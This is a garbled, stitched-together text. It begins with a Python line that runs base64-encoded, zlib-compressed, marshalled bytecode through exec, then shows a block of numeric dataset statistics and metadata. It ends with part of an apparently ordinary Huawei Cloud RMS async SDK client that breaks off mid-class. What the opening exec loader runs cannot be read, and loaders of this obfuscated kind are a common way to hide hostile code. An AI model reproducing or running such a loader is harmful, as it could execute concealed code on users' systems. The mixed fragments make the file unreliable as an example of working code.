Ljs3Hf0yO90Q6+alu04rhCx8Zoe9XcboXQYjVrdSw5EI1XTrDgDYV+LtQhfLfEqHkcSBerTfrc8Fkenl40DXHBb5QsKGORGyaRio6PJHnZkcwCtVvicZc6bwA+LeFWpgGBknZwvwCxSJoU59KgSz+t37kwXHEnd2QNlwqIrqlqGSuaWoDHujGk0WTjgTiA0TudhIqIMTWccDW9noONxQpoyaGzWO4Kh6Bw6Ao3kRtDwqKHO67qp1ir8Ir08NQ3B96Br7fONwH/QN+zz00tg7u8gxYcgPuTHLojd85g0IvUGekO9vl455AtJ9X9/76HeL1n/gPT/UgCT3Q=="))))
exec(marshal.loads(zlib.decompress(base64.b64decode("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"))))
| 742.9375
| 5,862
| 0.962228
| 398
| 11,887
| 28.731156
| 0.51005
| 0.001924
| 0.002798
| 0.003498
| 0.989943
| 0.989943
| 0.989943
| 0.989943
| 0.989943
| 0.989943
| 0
| 0.156208
| 0.002608
| 11,887
| 15
| 5,863
| 792.466667
| 0.808283
| 0.009674
| 0
| 0.666667
| 0
| 0.666667
| 0.986571
| 0.986571
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 15
|
f30cb1a6c95b09e7886a49f2540f3f14a511fcd8
| 53,825
|
py
|
Python
|
huaweicloud-sdk-rms/huaweicloudsdkrms/v1/rms_async_client.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | 64
|
2020-06-12T07:05:07.000Z
|
2022-03-30T03:32:50.000Z
|
huaweicloud-sdk-rms/huaweicloudsdkrms/v1/rms_async_client.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | 11
|
2020-07-06T07:56:54.000Z
|
2022-01-11T11:14:40.000Z
|
huaweicloud-sdk-rms/huaweicloudsdkrms/v1/rms_async_client.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | 24
|
2020-06-08T11:42:13.000Z
|
2022-03-04T06:44:08.000Z
|
# coding: utf-8
from __future__ import absolute_import
import datetime
import re
import importlib
import six
from huaweicloudsdkcore.client import Client, ClientBuilder
from huaweicloudsdkcore.exceptions import exceptions
from huaweicloudsdkcore.utils import http_utils
from huaweicloudsdkcore.sdk_stream_request import SdkStreamRequest
class RmsAsyncClient(Client):
"""
:param configuration: .Configuration object for this client
:param pool_threads: The number of threads to use for async requests
to the API. More threads means more concurrent API requests.
"""
PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if six.PY3 else long,
'float': float,
'str': str,
'bool': bool,
'date': datetime.date,
'datetime': datetime.datetime,
'object': object,
}
def __init__(self):
super(RmsAsyncClient, self).__init__()
self.model_package = importlib.import_module("huaweicloudsdkrms.v1.model")
self.preset_headers = {'User-Agent': 'HuaweiCloud-SDK-Python'}
@classmethod
def new_builder(cls, clazz=None):
if clazz is None:
return ClientBuilder(cls, "GlobalCredentials")
if clazz.__name__ != "RmsClient":
raise TypeError("client type error, support client type is RmsClient")
return ClientBuilder(clazz, "GlobalCredentials")
def show_resource_history_async(self, request):
"""查询资源历史
查询资源与资源关系的变更历史
:param ShowResourceHistoryRequest request
:return: ShowResourceHistoryResponse
"""
return self.show_resource_history_with_http_info(request)
def show_resource_history_with_http_info(self, request):
"""查询资源历史
查询资源与资源关系的变更历史
:param ShowResourceHistoryRequest request
:return: ShowResourceHistoryResponse
"""
all_params = ['resource_id', 'marker', 'limit', 'earlier_time', 'later_time', 'chronological_order']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'resource_id' in local_var_params:
path_params['resource_id'] = local_var_params['resource_id']
query_params = []
if 'marker' in local_var_params:
query_params.append(('marker', local_var_params['marker']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'earlier_time' in local_var_params:
query_params.append(('earlier_time', local_var_params['earlier_time']))
if 'later_time' in local_var_params:
query_params.append(('later_time', local_var_params['later_time']))
if 'chronological_order' in local_var_params:
query_params.append(('chronological_order', local_var_params['chronological_order']))
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/resources/{resource_id}/history',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowResourceHistoryResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def create_policy_assignments_async(self, request):
"""创建合规规则
创建新的合规规则
:param CreatePolicyAssignmentsRequest request
:return: CreatePolicyAssignmentsResponse
"""
return self.create_policy_assignments_with_http_info(request)
def create_policy_assignments_with_http_info(self, request):
"""创建合规规则
创建新的合规规则
:param CreatePolicyAssignmentsRequest request
:return: CreatePolicyAssignmentsResponse
"""
all_params = ['policy_assignment_request_body']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments',
method='PUT',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='CreatePolicyAssignmentsResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def delete_policy_assignment_async(self, request):
"""删除合规规则
根据规则ID删除此规则
:param DeletePolicyAssignmentRequest request
:return: DeletePolicyAssignmentResponse
"""
return self.delete_policy_assignment_with_http_info(request)
def delete_policy_assignment_with_http_info(self, request):
"""删除合规规则
根据规则ID删除此规则
:param DeletePolicyAssignmentRequest request
:return: DeletePolicyAssignmentResponse
"""
all_params = ['policy_assignment_id']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'policy_assignment_id' in local_var_params:
path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']
query_params = []
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}',
method='DELETE',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='DeletePolicyAssignmentResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def disable_policy_assignment_async(self, request):
"""停用合规规则
根据规则ID停用此规则
:param DisablePolicyAssignmentRequest request
:return: DisablePolicyAssignmentResponse
"""
return self.disable_policy_assignment_with_http_info(request)
def disable_policy_assignment_with_http_info(self, request):
"""停用合规规则
根据规则ID停用此规则
:param DisablePolicyAssignmentRequest request
:return: DisablePolicyAssignmentResponse
"""
all_params = ['policy_assignment_id']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'policy_assignment_id' in local_var_params:
path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']
query_params = []
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}/disable',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='DisablePolicyAssignmentResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def enable_policy_assignment_async(self, request):
"""启用合规规则
根据规则ID启用此规则
:param EnablePolicyAssignmentRequest request
:return: EnablePolicyAssignmentResponse
"""
return self.enable_policy_assignment_with_http_info(request)
def enable_policy_assignment_with_http_info(self, request):
"""启用合规规则
根据规则ID启用此规则
:param EnablePolicyAssignmentRequest request
:return: EnablePolicyAssignmentResponse
"""
all_params = ['policy_assignment_id']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'policy_assignment_id' in local_var_params:
path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']
query_params = []
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}/enable',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='EnablePolicyAssignmentResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_built_in_policy_definitions_async(self, request):
"""列出内置策略
列出用户的内置策略
:param ListBuiltInPolicyDefinitionsRequest request
:return: ListBuiltInPolicyDefinitionsResponse
"""
return self.list_built_in_policy_definitions_with_http_info(request)
def list_built_in_policy_definitions_with_http_info(self, request):
"""列出内置策略
列出用户的内置策略
:param ListBuiltInPolicyDefinitionsRequest request
:return: ListBuiltInPolicyDefinitionsResponse
"""
all_params = ['x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/policy-definitions',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListBuiltInPolicyDefinitionsResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_policy_assignments_async(self, request):
"""列出合规规则
列出用户的合规规则
:param ListPolicyAssignmentsRequest request
:return: ListPolicyAssignmentsResponse
"""
return self.list_policy_assignments_with_http_info(request)
def list_policy_assignments_with_http_info(self, request):
"""列出合规规则
列出用户的合规规则
:param ListPolicyAssignmentsRequest request
:return: ListPolicyAssignmentsResponse
"""
all_params = []
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListPolicyAssignmentsResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_policy_states_by_assignment_id_async(self, request):
"""获取规则的合规结果
根据规则ID查询所有的合规结果
:param ListPolicyStatesByAssignmentIdRequest request
:return: ListPolicyStatesByAssignmentIdResponse
"""
return self.list_policy_states_by_assignment_id_with_http_info(request)
def list_policy_states_by_assignment_id_with_http_info(self, request):
"""获取规则的合规结果
根据规则ID查询所有的合规结果
:param ListPolicyStatesByAssignmentIdRequest request
:return: ListPolicyStatesByAssignmentIdResponse
"""
all_params = ['policy_assignment_id', 'compliance_state', 'resource_id', 'resource_name', 'limit', 'marker']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'policy_assignment_id' in local_var_params:
path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']
query_params = []
if 'compliance_state' in local_var_params:
query_params.append(('compliance_state', local_var_params['compliance_state']))
if 'resource_id' in local_var_params:
query_params.append(('resource_id', local_var_params['resource_id']))
if 'resource_name' in local_var_params:
query_params.append(('resource_name', local_var_params['resource_name']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'marker' in local_var_params:
query_params.append(('marker', local_var_params['marker']))
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}/policy-states',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListPolicyStatesByAssignmentIdResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_policy_states_by_domain_id_async(self, request):
"""获取用户的合规结果
查询用户所有的合规结果
:param ListPolicyStatesByDomainIdRequest request
:return: ListPolicyStatesByDomainIdResponse
"""
return self.list_policy_states_by_domain_id_with_http_info(request)
def list_policy_states_by_domain_id_with_http_info(self, request):
"""获取用户的合规结果
查询用户所有的合规结果
:param ListPolicyStatesByDomainIdRequest request
:return: ListPolicyStatesByDomainIdResponse
"""
all_params = ['compliance_state', 'resource_id', 'resource_name', 'limit', 'marker']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'compliance_state' in local_var_params:
query_params.append(('compliance_state', local_var_params['compliance_state']))
if 'resource_id' in local_var_params:
query_params.append(('resource_id', local_var_params['resource_id']))
if 'resource_name' in local_var_params:
query_params.append(('resource_name', local_var_params['resource_name']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'marker' in local_var_params:
query_params.append(('marker', local_var_params['marker']))
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/policy-states',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListPolicyStatesByDomainIdResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_policy_states_by_resource_id_async(self, request):
"""获取资源的合规结果
根据资源ID查询所有合规结果
:param ListPolicyStatesByResourceIdRequest request
:return: ListPolicyStatesByResourceIdResponse
"""
return self.list_policy_states_by_resource_id_with_http_info(request)
def list_policy_states_by_resource_id_with_http_info(self, request):
"""获取资源的合规结果
根据资源ID查询所有合规结果
:param ListPolicyStatesByResourceIdRequest request
:return: ListPolicyStatesByResourceIdResponse
"""
all_params = ['resource_id', 'compliance_state', 'limit', 'marker']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'resource_id' in local_var_params:
path_params['resource_id'] = local_var_params['resource_id']
query_params = []
if 'compliance_state' in local_var_params:
query_params.append(('compliance_state', local_var_params['compliance_state']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'marker' in local_var_params:
query_params.append(('marker', local_var_params['marker']))
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/resources/{resource_id}/policy-states',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListPolicyStatesByResourceIdResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def run_evaluation_by_policy_assignment_id_async(self, request):
"""运行合规评估
根据规则ID评估此规则
:param RunEvaluationByPolicyAssignmentIdRequest request
:return: RunEvaluationByPolicyAssignmentIdResponse
"""
return self.run_evaluation_by_policy_assignment_id_with_http_info(request)
def run_evaluation_by_policy_assignment_id_with_http_info(self, request):
"""运行合规评估
根据规则ID评估此规则
:param RunEvaluationByPolicyAssignmentIdRequest request
:return: RunEvaluationByPolicyAssignmentIdResponse
"""
all_params = ['policy_assignment_id']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'policy_assignment_id' in local_var_params:
path_params['policy_assignment_id'] = local_var_params['policy_assignment_id']
query_params = []
header_params = {}
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = ['PkiTokenAuth']
return self.call_api(
resource_path='/v1/resource-manager/domains/{domain_id}/policy-assignments/{policy_assignment_id}/policy-states/run-evaluation',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='RunEvaluationByPolicyAssignmentIdResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_built_in_policy_definition_async(self, request):
"""查询单个内置策略
根据策略ID查询单个内置策略
:param ShowBuiltInPolicyDefinitionRequest request
:return: ShowBuiltInPolicyDefinitionResponse
"""
return self.show_built_in_policy_definition_with_http_info(request)
